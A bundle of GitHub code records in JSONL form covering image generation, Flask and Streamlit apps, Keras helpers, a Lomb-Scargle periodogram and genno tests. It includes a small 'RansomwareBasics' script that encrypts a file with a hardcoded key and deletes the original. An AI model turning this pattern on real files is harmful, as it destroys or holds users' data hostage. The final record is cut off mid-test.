'ddim':\n args.ddim_eta = 0\n\n if anim_args.animation_mode == 'None':\n anim_args.max_frames = 1\n elif anim_args.animation_mode == 'Video Input':\n args.use_init = True\n\n # clean up unused memory\n gc.collect()\n torch.cuda.empty_cache()\n\n # dispatch to appropriate renderer\n if anim_args.animation_mode == '2D' or anim_args.animation_mode == '3D':\n render_animation(device, args, half_precision, model, anim_args, models_path, animation_prompts)\n elif anim_args.animation_mode == 'Video Input':\n render_input_video(args, anim_args)\n elif anim_args.animation_mode == 'Interpolation':\n render_interpolation(device, args, model, anim_args, animation_prompts)\n else:\n render_image_batch(args) \n\n image_folder = os.path.join(output_path, time.strftime('%Y-%m'), args.batch_name)\n video_name = os.path.join(output_path, \"videos\", f\"test_{args.timestring}_{cli_args.prompt}.avi\")\n\n render_video(image_folder, video_name)\n\n print(\"Generation finished\")\n\n ","repo_name":"K-Schubert/iarts","sub_path":"stable-diffusion-videos/deforum_cuda_v04_singleGPU.py","file_name":"deforum_cuda_v04_singleGPU.py","file_ext":"py","file_size_in_byte":7759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4114818279","text":"def welcome(name):\n \"\"\"\n This method is a Welcome Message for user.\n :param name: username\n :return: hello message\n \"\"\"\n return f'Hello {name} and welcome to the World of Games (WoG)\\nHere you can find many cool games to play.'\n\ndef load_game():\n \"\"\"\n this method is a load game who user like to play.\n :return:\n \"\"\"\n game_msg_menu = \"Please choose a game to play:\\n\\t\" \\\n \"1. Memory Game - a sequence of numbers will appear for 1 second and you have to guess it back\\n\\t\" \\\n \"2. Guess Game - guess a number and see if you chose like the computer\"\n game_msg_level = \"Please choose game level from 1-5: \"\n print(game_msg_menu)\n while True:\n try:\n user_game_choice = int(input(\"please choose: \"))\n break\n except ValueError as e:\n print(f\"You Get a {e.__class__.__name__}\\nplease enter only an integer number\")\n\n while True:\n if user_game_choice == 1 or user_game_choice == 2:\n break\n else:\n print(game_msg_menu)\n try:\n user_game_choice = int(input(\"your choice is not exists, please choose agein: \"))\n except ValueError as e:\n print(f\"You Get a {e.__class__.__name__}\\nplease enter only an integer number\")\n\n while True:\n try:\n user_level_choice = int(input(game_msg_level))\n except ValueError as e:\n print(f\"You Get a {e.__class__.__name__}\\nplease enter only an integer number\")\n if user_level_choice < 1 or user_level_choice > 5:\n print(\"out of range, please choose again\")\n else:\n break\n return user_game_choice, user_level_choice","repo_name":"adiha2033/experts-games","sub_path":"Live.py","file_name":"Live.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39162215133","text":"import streamlit as st\nimport os\nimport pandas as pd\n\n\ndef app():\n\n hide_table_row_index = \"\"\"\n \n \"\"\"\n\n st.markdown(\"### Instructions\")\n\n df = pd.read_csv(os.path.join(\"inputs\", \"instructions.csv\"), sep=\";\", names=[\"Step\", \"Instruction\", \"Notes\"],\n index_col=False, header=None)\n\n st.markdown(hide_table_row_index, unsafe_allow_html=True)\n st.table(df)","repo_name":"spmckenna/risk_demo","sub_path":"pages/instructions.py","file_name":"instructions.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3688633687","text":"from flask import Flask, request, send_file\nfrom flask_cors import CORS\nfrom PIL import Image\nimport io\nimport os\nimport re\n\napp = Flask(__name__)\nCORS(app)\n\nUPLOAD_FOLDER = '/Users/zhuangjunling/Documents/GitHub/GSAPP/Dense-Material-Segmentation/Flask/imageSegmentation/input'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\nOUTPUT_FOLDER = '/Users/zhuangjunling/Documents/GitHub/GSAPP/Dense-Material-Segmentation/Flask/imageSegmentation/output'\napp.config['OUTPUT_FOLDER'] = OUTPUT_FOLDER\n\nSVIIMAGES_FOLDER = '/Users/zhuangjunling/Documents/GitHub/GSAPP/Materiafolio/materialfolio/public/SVI_Images'\napp.config['SVIIMAGES_FOLDER'] = SVIIMAGES_FOLDER\n\nSEGEMENTIMAGES_FOLDER = '/Users/zhuangjunling/Documents/GitHub/GSAPP/Materiafolio/materialfolio/public/Segemented_Images'\napp.config['SEGEMENTIMAGES_FOLDER'] = SEGEMENTIMAGES_FOLDER\n\n@app.route('/upload', methods=['POST'])\ndef upload_file():\n if request.method == 'POST':\n file = request.files['file']\n if file:\n \n # Get the names of all files in the specified folder\n filenames = os.listdir(app.config['SVIIMAGES_FOLDER'])\n\n # Extracts the numeric part of a file name using a regular expression and sorts the file name by the numeric part\n pattern = re.compile(r'^(\\d+)(\\.[a-zA-Z]+)$')\n numbers = []\n for filename in filenames:\n match = pattern.match(filename)\n if match:\n number = int(match.group(1))\n numbers.append(number)\n\n if len(numbers) > 0:\n # Sort the names of successfully matched files and calculate the new numeric part\n numbers_sorted = sorted(numbers)\n new_number = numbers_sorted[-1] + 1\n\n # Combine the numeric part and the specified suffix (e.g. .jpg) into a new file name\n new_filename = str(new_number) + \".jpg\"\n\n # Combine the new file name and destination folder path, for example\"/path/to/destination/600.jpg\"\n file_path_SVI_new = os.path.join(app.config['SVIIMAGES_FOLDER'], new_filename)\n\n # Combine the numeric part and the specified suffix (e.g. .jpg) into a new file name\n print(new_filename)\n\n\n\n filename = file.filename\n print(filename)\n file_path = os.path.join(app.config['UPLOAD_FOLDER'], new_filename)\n file_path_output = os.path.join(app.config['OUTPUT_FOLDER'], os.path.splitext(new_filename)[0] + \".png\")\n\n # Handle frontend foloer path\n file_path_SVI = os.path.join(app.config['SVIIMAGES_FOLDER'], new_filename)\n file_path_SVI_output = os.path.join(app.config['SEGEMENTIMAGES_FOLDER'], os.path.splitext(new_filename)[0] + \".png\")\n\n # print(file_path_output)\n # print(file_path_SVI_output)\n file.save(file_path)\n\n # Store Orignial SVI image to frontend folder\n file.seek(0) # Resetting the file pointer to the beginning of the file\n file.save(file_path_SVI)\n\n\n \n os.system(\"python ./imageSegmentation/inference.py --jit_path ./imageSegmentation/DMS46_v1.pt --image_folder ./imageSegmentation/input --output_folder ./imageSegmentation/output\")\n\n # Open and crop the right half of the image\n image = Image.open(file_path_output)\n width, height = image.size\n cropped_image = image.crop((width // 2, 0, width, height))\n cropped_image.save(file_path_output)\n\n # Store SVI Segementation image to frontend folder\n cropped_image.save(file_path_SVI_output)\n\n # Save the cropped image to memory\n output = io.BytesIO()\n cropped_image.save(output, format='PNG')\n output.seek(0)\n\n # Send the cropped image back to the front end\n return send_file(output, mimetype='image/png')\n else:\n return {'status': 'error', 'message': 'No file uploaded'}\n\nif __name__ == '__main__':\n app.run()\n\n\n\n\n# flask --app hello.py run\n","repo_name":"JunlingZhuang/Dense-Material-Segmentation","sub_path":"Flask/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5672142847","text":"\"\"\"A surface to notify an admin about a particular message\n\nRight now, it is a Telegram bot, but can be customized\n\"\"\"\n\nfrom yellowbot.surfaces.baseinteractionsurface import BaseInteractionSurface\nfrom yellowbot.surfaces.surfacemessage import SurfaceMessage\n\n\nclass NotifyAdminSurface(BaseInteractionSurface):\n def __init__(\n self,\n surface_name: str,\n channel_id: str):\n BaseInteractionSurface.__init__(\n self,\n surface_name)\n self._channel_id = channel_id\n\n def forge_notification(self, text: str) -> SurfaceMessage:\n \"\"\"Creates the notification message, in a way coherent with the surface\n capabilities\n\n :param text:\n :type text: str\n\n :returns: the message to send\n :rtype: SurfaceMessage\n \"\"\"\n return SurfaceMessage(\n self._surface_name,\n self._channel_id,\n text\n )\n","repo_name":"rainbowbreeze/yellowbutler","sub_path":"bot/src/yellowbot/surfaces/notifyadminsurface.py","file_name":"notifyadminsurface.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29472200120","text":"import logging\n\nfrom aleph.db.accessors.messages import refresh_address_stats_mat_view\nfrom aleph.types.db_session import DbSessionFactory\nimport asyncio\n\nLOGGER = logging.getLogger(__name__)\n\n\nasync def refresh_cache_materialized_views(session_factory: DbSessionFactory) -> None:\n \"\"\"\n Refresh DB materialized views used as caches, periodically.\n\n Materialized views are a simple solution to cache expensive DB queries, at the cost\n of refreshing them manually once in a while. This background task does exactly that.\n Note that materialized views used by the API should support concurrent refreshing\n to reduce latency.\n \"\"\"\n\n while True:\n try:\n with session_factory() as session:\n refresh_address_stats_mat_view(session)\n session.commit()\n LOGGER.info(\"Refreshed address stats materialized view\")\n\n except Exception:\n LOGGER.exception(\"Error refreshing cache materialized views\")\n\n await asyncio.sleep(10 * 60)\n","repo_name":"aleph-im/pyaleph","sub_path":"src/aleph/services/cache/materialized_views.py","file_name":"materialized_views.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"32"} +{"seq_id":"34127565321","text":"#Category 3\nimport os\nfrom cryptography.fernet import Fernet\n\ndef encrypt_file(key, file_name):\n encrypted_file_name = os.path.splitext(file_name)[0] + '_encrypted' + os.path.splitext(file_name)[1]\n with open(file_name, 'rb') as f:\n with open(encrypted_file_name, 'wb') as f_enc:\n plain_text = f.read()\n f_enc.write(plain_text)\n\n cipher_suite = Fernet(key)\n cipher_text = cipher_suite.encrypt(plain_text)\n\n with open(encrypted_file_name, 'wb') as f:\n f.write(cipher_text)\n \n os.remove(file_name)\n\ndef decrypt_file(key, file_name):\n with open(file_name, 'rb') as f:\n cipher_text = f.read()\n cipher_suite = Fernet(key)\n plain_text = cipher_suite.decrypt(cipher_text)\n\n with open(file_name, 'wb') as f:\n f.write(plain_text)\n\nkey, file_name = b'7r128iawNRAJVPoZDcR2rh4Oz_En3XW8UboAfM4keSg=', 'Test_encrypted.txt'\nencrypt_file(key, file_name)\n\n# decrypt_file(key, file_name)\n","repo_name":"JACTheCreator/RansomwareBasics","sub_path":"cat3.py","file_name":"cat3.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"17504443918","text":"from typing import Optional\n\nfrom pydantic import BaseModel\n\nfrom apps.base.schemas import PointCoordinatesSchema\n\n\nclass DeliveryCommon(BaseModel):\n courier_id: int\n destination_point: str\n comment: str\n status: str\n\n class Config:\n fields = {\n 'courier_id': {\n 'title': 'Courier ID.',\n 'example': 3\n },\n 'destination_point': {\n 'title': 'Destination point.',\n 'example': \"POINT(4 1)\"\n },\n 'comment': {\n 'title': 'Comment.',\n 'example': 'Please deliver ASAP!'\n },\n 'status': {\n 'title': 'Delivery status.',\n 'example': 'created'\n },\n }\n\n\nclass DeliveryCreateManuallySchema(DeliveryCommon):\n pass\n\n\nclass DeliveryCreateSchema(BaseModel):\n destination_point: PointCoordinatesSchema\n comment: str\n\n class Config:\n fields = {\n 'destination_point': {\n 'title': 'Destination point.',\n 'example': {\n 'latitude': 55.75,\n 'longitude': 37.61\n }\n },\n 'comment': {\n 'title': 'Comment',\n 'example': 'ASAP please!'\n },\n }\n\n\nclass DeliveryGetSchema(DeliveryCommon):\n id: int\n\n class Config:\n orm_mode = True\n fields = {\n 'id': {\n 'example': 43\n }\n }\n\n\nclass DeliveryUpdateSchema(DeliveryCommon):\n courier_id: Optional[int]\n destination_point: Optional[str]\n comment: Optional[str]\n status: Optional[str]\n courier: Optional[int]\n","repo_name":"a-povazhnyi/delivery-service","sub_path":"src/apps/deliveries/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9564497441","text":"import re\nimport contextlib\n\ndef trycast(val):\n for cast in (int, float, str, lambda x: x):\n with contextlib.suppress(ValueError):\n return cast(val)\n\n\ndef get_dna(file):\n with open(file) as f:\n contents = f.read()\n contents = re.sub(r'v.\\sspeed', 'variable', contents, flags=re.IGNORECASE)\n contents = re.sub(r'[?,]', '', contents)\n contents = contents.replace('\\n', ' ')\n return contents\n\n\n\nclass System:\n __slots__ = [\n \"brand\", \"type\", \"size\", \"seer\", \"eer\", \"hspf\", 'ahri', 'afue',\n 'cu_btu', 'cu_model', 'cu_family', 'cu_price', 'cu_mop', 'cu_mca',\n 'cu_dimensions', 'cu_liq', 'cu_gas',\n 'ahu_model', 'ahu_family', 'ahu_price', 'ahu_dimensions', 'fan_motor',\n 'ahu_valve', 'ahu_valve_price',\n 'filter_size',\n 'cat_coil', 'coil_type', 'coil_model', 'coil_position','coil_dimensions', 'coil_price',\n 'cat_heater', 'heater_model','heater_price',\n 'furnace_model', 'furnace_family', 'furnace_dimensions', 'furnace_btu','furnace_price',\n 'furnace_position', 'gas_value',\n 'system_price'\n ]\n\n @property\n def __dict__(self):\n return {k: getattr(self, k) for k in self.__slots__ if hasattr(self, k)}\n\n\nFIELDS = System.__slots__.copy()\n\n\n# class System:\n# def __init__(self, **kwargs):\n# self.brand = None\n# self.type = None\n# self.size = None\n# self.seer = None\n# self.eer=None\n# self.hspf=None\n# self.ahri=None\n# self.afue=None\n# self.cu_btu=None\n# self.cu_model=None\n# self.cu_family=None\n# self.cu_price=None\n# self.cu_mop=None\n# self.cu_mca=None\n# self.cu_dimensions=None\n# self.cu_liq', 'cu_gas',\n# 'ahu_model', 'ahu_family', 'ahu_price', 'ahu_dimensions', 'fan_motor', 'ahu_valve', 'ahu_valve_price'\n# 'filter_size',\n# 'cat_coil', 'coil_type', 'coil_model', 'coil_position', 'coil_dimensions', 'coil_price',\n# 'cat_heater', 'heater_model', 'heater_price',\n# 'furnace_model', 'furnace_family', 'furnace_dimensions', 'furnace_btu', 'furnace_price', 'furnace_position',\n# 'gas_value',\n# 'system_price'\n# ])","repo_name":"nicker-bocker/lennox_price_book_to_csv","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8225254110","text":"import tensorflow as tf\nfrom tensorflow.keras.models import Model\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport os\nimport logging\n\nfrom .common import create_directories\n\n\ndef get_prepared_model(stage: str, no_classes: int, input_shape: list, loss: str, optimizer: str, metrics: list) -> \\\n Model:\n \"\"\"Function creates ANN model and compile.\n Args:\n stage ([str]): stage of experiment\n no_classes ([INT]): No of classes for classification\n input_shape ([int, int]): Input shape for model's input layer\n loss ([str]): Loss function for model\n optimizer ([str]): Optimizer for model\n metrics ([str]): Metrics to watch while training\n Returns:\n model: ANN demo model\n \"\"\"\n # Define layers\n LAYERS = []\n BASE_LAYERS = [\n tf.keras.layers.Flatten(input_shape=input_shape, name='input_layer'),\n tf.keras.layers.Dense(units=392, activation='relu', name='hidden1'),\n tf.keras.layers.Dense(units=196, activation='relu', name='hidden2'),\n tf.keras.layers.Dense(units=no_classes, activation='softmax', name='output_layer')\n ]\n\n KERNEL_INIT_LAYERS = [\n tf.keras.layers.Flatten(input_shape=input_shape, name='input_layer'),\n tf.keras.layers.Dense(units=392, activation='relu', name='hidden1', kernel_initializer='glorot_uniform',\n bias_initializer='zeros'),\n tf.keras.layers.Dense(units=196, activation='relu', name='hidden2', kernel_initializer='glorot_uniform',\n bias_initializer='zeros'),\n tf.keras.layers.Dense(units=no_classes, activation='softmax', name='output_layer')\n ]\n\n BN_BEFORE_LAYERS = [\n tf.keras.layers.Flatten(input_shape=input_shape, name='input_layer'),\n tf.keras.layers.Dense(units=392, name='hidden1', kernel_initializer='glorot_uniform'),\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(units=196, name='hidden2', kernel_initializer='glorot_uniform'),\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(units=no_classes, activation='softmax', name='output_layer')\n ]\n\n BN_AFTER_LAYERS = [\n tf.keras.layers.Flatten(input_shape=input_shape, name='input_layer'),\n tf.keras.layers.Dense(units=392, activation='relu', name='hidden1', kernel_initializer='glorot_uniform',\n bias_initializer='zeros'),\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.Dense(units=196, activation='relu', name='hidden2', kernel_initializer='glorot_uniform',\n bias_initializer='zeros'),\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.Dense(units=no_classes, activation='softmax', name='output_layer')\n ]\n\n logging.info(\"Creating Model..\")\n if stage == 'BASE_MODEL':\n LAYERS = BASE_LAYERS\n elif stage == 'KERNEL_INIT_MODEL':\n LAYERS = KERNEL_INIT_LAYERS\n elif stage == 'BN_BEFORE_MODEL':\n LAYERS = BN_BEFORE_LAYERS\n elif stage == 'BN_AFTER_MODEL':\n LAYERS = BN_AFTER_LAYERS\n\n model_ann = tf.keras.models.Sequential(LAYERS)\n\n logging.info(\"Compiling Model..\")\n model_ann.compile(loss=loss, optimizer=optimizer, metrics=metrics)\n\n return model_ann\n\n\ndef save_model(model_dir: str, model: Model, model_suffix: str) -> None:\n \"\"\"\n args:\n model_dir: directory to save the model\n model: model object to save\n model_suffix: Suffix to save the model\n \"\"\"\n create_directories([model_dir])\n model_file = os.path.join(model_dir, f\"{model_suffix}.h5\")\n model.save(model_file)\n logging.info(f\"Saved model: {model_file}\")\n\n\ndef save_history_plot(history, plot_dir: str, stage: str) -> None:\n \"\"\"\n Args:\n history: History object for plotting loss/accuracy curves\n plot_dir: Directory to save plot files\n stage: Stage name for training\n \"\"\"\n pd.DataFrame(history.history).plot(figsize=(10, 8))\n plt.grid(True)\n create_directories([plot_dir])\n plot_file = os.path.join(plot_dir, stage + \"_loss_accuracy.png\")\n plt.savefig(plot_file)\n logging.info(f\"Loss accuracy plot saved: {plot_file}\")\n\n\ndef get_callbacks(checkpoint_dir: str, tensorboard_logs: str, stage: str) -> list:\n \"\"\"\n Args:\n checkpoint_dir: Directory to save the model at checkpoint\n tensorboard_logs: Directory to save tensorboard logs\n stage: Stage name for training\n Returns:\n callback_list: List of created callbacks\n \"\"\"\n create_directories([checkpoint_dir, tensorboard_logs])\n tensorboard_cb = tf.keras.callbacks.TensorBoard(tensorboard_logs)\n early_stopping_cb = tf.keras.callbacks.EarlyStopping(patience=3, restore_best_weights=True)\n ckpt_file_path = os.path.join(checkpoint_dir, f\"{stage}_ckpt_model.h5\")\n checkpoint_cb = tf.keras.callbacks.ModelCheckpoint(filepath=ckpt_file_path, save_best_only=True)\n\n callback_list = [tensorboard_cb, early_stopping_cb, checkpoint_cb]\n logging.info(f\"Callbacks created: {callback_list}\")\n return callback_list\n","repo_name":"iDataAstro/MNIST_CLASSIFICATION","sub_path":"src/utils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40459715096","text":"\"\"\"\nMain Lomb-Scargle Implementation\n\nThe ``lombscargle`` function here is essentially a sophisticated switch\nstatement for the various implementations available in this submodule\n\"\"\"\nimport warnings\n\nimport numpy as np\nfrom astropy import units\nfrom astropy.utils.compat.numpy import broadcast_arrays\n\nfrom .slow_impl import lombscargle_slow\nfrom .fast_impl import lombscargle_fast\nfrom .scipy_impl import lombscargle_scipy\nfrom .chi2_impl import lombscargle_chi2\nfrom .fastchi2_impl import lombscargle_fastchi2\n\n\nMETHODS = {'slow': lombscargle_slow,\n 'fast': lombscargle_fast,\n 'chi2': lombscargle_chi2,\n 'scipy': lombscargle_scipy,\n 'fastchi2': lombscargle_fastchi2}\n\n\ndef _validate_inputs(t, y, dy=None, frequency=None, strip_units=True):\n \"\"\"Validation of input shapes & units\n\n This utility function serves a few purposes:\n\n - it validates that the shapes of t, y, and dy match, and broadcasts\n them to a common 1D shape\n - if any of t, y, day, or frequency are astropy Quantities (i.e. have\n units attached), it validates that the units are compatible, and does\n any necessary unit conversions\n - if ``strip_units == True``, it strips units from all the arrays\n before returning them.\n - all relevant units are returned in ``unit_dict``\n\n Parameters\n ----------\n t, y : array_like or Quantity\n dy, frequency : array_like or Quantity (optional)\n strip_units : bool (optional, default=True)\n if True, the returned quantities will have units stripped.\n\n Returns\n -------\n t, y, dy, frequency : ndarray, Quantity, or None\n reshaped and/or unit-stripped arrays\n unit_dict : dict\n dictionary of relevant units\n \"\"\"\n if dy is None:\n t, y = broadcast_arrays(t, y, subok=True)\n else:\n t, y, dy = broadcast_arrays(t, y, dy, subok=True)\n\n if t.ndim != 1:\n raise ValueError(\"Input times & data must be one-dimensional\")\n\n has_units = any(isinstance(arr, units.Quantity)\n for arr in (t, y, dy, frequency))\n\n if has_units:\n power_unit = units.dimensionless_unscaled\n\n t = units.Quantity(t)\n y = units.Quantity(y)\n\n if frequency is not None:\n frequency = units.Quantity(frequency)\n if not t.unit.is_equivalent(1. / frequency.unit):\n raise ValueError(\"Units of frequency not equivalent to \"\n \"units of 1/t\")\n t = units.Quantity(t, unit=1. / frequency.unit)\n\n if dy is not None:\n dy = units.Quantity(dy)\n if not y.unit.is_equivalent(dy.unit):\n raise ValueError(\"Units of y not equivalent to units of dy\")\n dy = units.Quantity(dy, unit=y.unit)\n else:\n power_unit = 1\n\n t = np.asarray(t)\n y = np.asarray(y)\n if dy is not None:\n dy = np.asarray(dy)\n\n def get_unit(val):\n if isinstance(val, units.Quantity):\n return val.unit\n else:\n return 1\n\n unit_dict = {'t': get_unit(t),\n 'y': get_unit(y),\n 'dy': get_unit(y),\n 'frequency': 1. / get_unit(t),\n 'power': power_unit}\n\n def unit_strip(arr):\n if arr is None:\n return arr\n else:\n return np.asarray(arr)\n\n if strip_units:\n t, y, dy, frequency = map(unit_strip, (t, y, dy, frequency))\n\n return t, y, dy, frequency, unit_dict\n\n\ndef _get_frequency_grid(frequency, assume_regular_frequency=False):\n \"\"\"Utility to get grid parameters from a frequency array\n\n Parameters\n ----------\n frequency : array_like or Quantity\n input frequency grid\n assume_regular_frequency : bool (default = False)\n if True, then do not check whether frequency is a regular grid\n\n Returns\n -------\n f0, df, N : scalars\n Parameters such that all(frequency == f0 + df * np.arange(N))\n \"\"\"\n frequency = np.asarray(frequency)\n if frequency.ndim != 1:\n raise ValueError(\"frequency grid must be 1 dimensional\")\n elif len(frequency) == 1:\n return frequency[0], frequency[0], 1\n elif not assume_regular_frequency:\n diff = frequency[1:] - frequency[:-1]\n if not np.allclose(diff[0], diff):\n raise ValueError(\"frequency must be a regular grid\")\n\n return frequency[0], frequency[1] - frequency[0], len(frequency)\n\n\ndef _is_regular(frequency, assume_regular_frequency=False):\n if assume_regular_frequency:\n return True\n\n frequency = np.asarray(frequency)\n\n if frequency.ndim != 1:\n return False\n elif len(frequency) == 1:\n return True\n else:\n diff = frequency[1:] - frequency[:-1]\n return np.allclose(diff[0], diff)\n\n\ndef _validate_method(method, dy, fit_bias, nterms,\n frequency, assume_regular_frequency):\n fast_method_ok = hasattr(np.ufunc, 'at')\n if not fast_method_ok:\n warnings.warn(\"Fast Lomb-Scargle methods require numpy version 1.8 \"\n \"or newer. Using slower methods instead.\")\n\n # automatically choose the appropiate method\n if method == 'auto':\n if nterms != 1:\n if (fast_method_ok and len(frequency) > 100\n and _is_regular(frequency, assume_regular_frequency)):\n method = 'fastchi2'\n else:\n method = 'chi2'\n elif (fast_method_ok and len(frequency) > 100\n and _is_regular(frequency, assume_regular_frequency)):\n method = 'fast'\n elif dy is None and not fit_bias:\n method = 'scipy'\n else:\n method = 'slow'\n\n\n if method not in METHODS:\n raise ValueError(\"invalid method: {0}\".format(method))\n\n return method\n\n\ndef lombscargle(t, y, dy=None,\n frequency=None,\n method='auto',\n assume_regular_frequency=False,\n normalization='normalized',\n fit_bias=True, center_data=True,\n method_kwds=None, nterms=1):\n \"\"\"\n Compute the Lomb-scargle Periodogram with a given method.\n\n Parameters\n ----------\n t : array_like\n sequence of observation times\n y : array_like\n sequence of observations associated with times t\n dy : float or array_like (optional)\n error or sequence of observational errors associated with times t\n frequency : array_like\n frequencies (not angular frequencies) at which to evaluate the\n periodogram. If not specified, optimal frequencies will be chosen using\n a heuristic which will attempt to provide sufficient frequency range\n and sampling so that peaks will not be missed. Note that in order to\n use method='fast', frequencies must be regularly spaced.\n method : string (optional)\n specify the lomb scargle implementation to use. Options are:\n\n - 'auto': choose the best method based on the input\n - 'fast': use the O[N log N] fast method. Note that this requires\n evenly-spaced frequencies: by default this will be checked unless\n `assume_regular_frequency` is set to True.\n - `slow`: use the O[N^2] pure-python implementation\n - `chi2`: use the O[N^2] chi2/linear-fitting implementation\n - `fastchi2`: use the O[N log N] chi2 implementation. Note that this\n requires evenly-spaced frequencies: by default this will be checked\n unless `assume_regular_frequency` is set to True.\n - `scipy`: use ``scipy.signal.lombscargle``, which is an O[N^2]\n implementation written in C. Note that this does not support\n heteroskedastic errors.\n\n assume_regular_frequency : bool (optional)\n if True, assume that the input frequency is of the form\n freq = f0 + df * np.arange(N). Only referenced if method is 'auto'\n or 'fast'.\n normalization : string (optional, default='normalized')\n Normalization to use for the periodogram. Options are 'normalized' or\n 'unnormalized'.\n fit_bias : bool (optional, default=True)\n if True, include a constant offet as part of the model at each\n frequency. This can lead to more accurate results, especially in then\n case of incomplete phase coverage.\n center_data : bool (optional, default=True)\n if True, pre-center the data by subtracting the weighted mean\n of the input data. This is especially important if `fit_bias = False`\n method_kwds : dict (optional)\n additional keywords to pass to the lomb-scargle method\n nterms : int (default=1)\n number of Fourier terms to use in the periodogram.\n Not supported with every method.\n\n Returns\n -------\n PLS : array_like\n Lomb-Scargle power associated with each frequency omega\n \"\"\"\n if frequency is None:\n raise ValueError(\"Must supply a valid frequency. If you would like \"\n \"an automatic frequency grid, use the \"\n \"LombScargle.autopower() method.\")\n\n t, y, dy, frequency, unit_dict = _validate_inputs(t, y, dy, frequency)\n\n output_shape = frequency.shape\n frequency = frequency.ravel()\n\n # we'll need to adjust args and kwds for each method\n args = (t, y, dy)\n kwds = dict(frequency=frequency,\n center_data=center_data,\n fit_bias=fit_bias,\n normalization=normalization,\n nterms=nterms,\n **(method_kwds or {}))\n\n method = _validate_method(method, dy=dy, fit_bias=fit_bias, nterms=nterms,\n frequency=frequency,\n assume_regular_frequency=assume_regular_frequency)\n\n # scipy doesn't support dy or fit_bias=True\n if method == 'scipy':\n if kwds.pop('fit_bias'):\n raise ValueError(\"scipy method does not support fit_bias=True\")\n if dy is not None:\n dy = np.ravel(np.asarray(dy))\n if not np.allclose(dy[0], dy):\n raise ValueError(\"scipy method only supports \"\n \"uniform uncertainties dy\")\n args = (t, y)\n\n # fast methods require frequency expressed as a grid\n if method.startswith('fast'):\n f0, df, Nf = _get_frequency_grid(kwds.pop('frequency'),\n assume_regular_frequency)\n kwds.update(f0=f0, df=df, Nf=Nf)\n\n # only chi2 methods support nterms\n if not method.endswith('chi2'):\n if kwds.pop('nterms') != 1:\n raise ValueError(\"nterms != 1 only supported with 'chi2' \"\n \"or 'fastchi2' methods\")\n\n PLS = METHODS[method](*args, **kwds)\n return PLS.reshape(output_shape) * unit_dict['power']\n","repo_name":"jakevdp/lombscargle","sub_path":"lombscargle/implementations/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10820,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"27468766122","text":"\"\"\"Tests for genno.quantity.\"\"\"\nimport logging\nimport operator\nimport re\n\nimport numpy as np\nimport pandas as pd\nimport pint\nimport pytest\nimport xarray as xr\nfrom numpy import nan\nfrom pytest import param\n\nfrom genno import Computer, Quantity, computations\nfrom genno.core.attrseries import AttrSeries\nfrom genno.core.quantity import assert_quantity, possible_scalar, unwrap_scalar\nfrom genno.core.sparsedataarray import SparseDataArray\nfrom genno.testing import add_large_data, assert_qty_allclose, assert_qty_equal\n\npytestmark = pytest.mark.usefixtures(\"parametrize_quantity_class\")\n\n\nclass TestQuantity:\n \"\"\"Tests of Quantity.\"\"\"\n\n @pytest.fixture\n def a(self):\n yield Quantity(xr.DataArray([0.8, 0.2], coords=[[\"oil\", \"water\"]], dims=[\"p\"]))\n\n @pytest.mark.parametrize(\n \"args, kwargs\",\n (\n # Integer, converted to float() for sparse\n ((3,), dict(units=\"kg\")),\n # Scalar object\n ((object(),), dict(units=\"kg\")),\n # pd.Series\n ((pd.Series([0, 1], index=[\"a\", \"b\"], name=\"foo\"),), dict(units=\"kg\")),\n # pd.DataFrame\n (\n (pd.DataFrame([[0], [1]], index=[\"a\", \"b\"], columns=[\"foo\"]),),\n dict(units=\"kg\"),\n ),\n pytest.param(\n (\n pd.DataFrame(\n [[0, 1], [2, 3]], index=[\"a\", \"b\"], columns=[\"foo\", \"bar\"]\n ),\n ),\n dict(units=\"kg\"),\n marks=pytest.mark.xfail(raises=TypeError),\n ),\n ),\n )\n def test_init(self, args, kwargs):\n \"\"\"Instantiated from a scalar object.\"\"\"\n Quantity(*args, **kwargs)\n\n def test_assert(self, a):\n \"\"\"Test assertions about Quantity.\n\n These are tests without `attr` property, in which case direct pd.Series\n and xr.DataArray comparisons are possible.\n \"\"\"\n with pytest.raises(\n TypeError,\n match=re.escape(\"arg #2 ('foo') is not Quantity; likely an incorrect key\"),\n ):\n assert_quantity(a, \"foo\")\n\n # Convert to pd.Series\n b = a.to_series()\n\n assert_qty_equal(a, b, check_type=False)\n assert_qty_equal(b, a, check_type=False)\n assert_qty_allclose(a, b, check_type=False)\n assert_qty_allclose(b, a, check_type=False)\n\n c = Quantity(a)\n\n assert_qty_equal(a, c, check_type=True)\n assert_qty_equal(c, a, check_type=True)\n assert_qty_allclose(a, c, check_type=True)\n assert_qty_allclose(c, a, 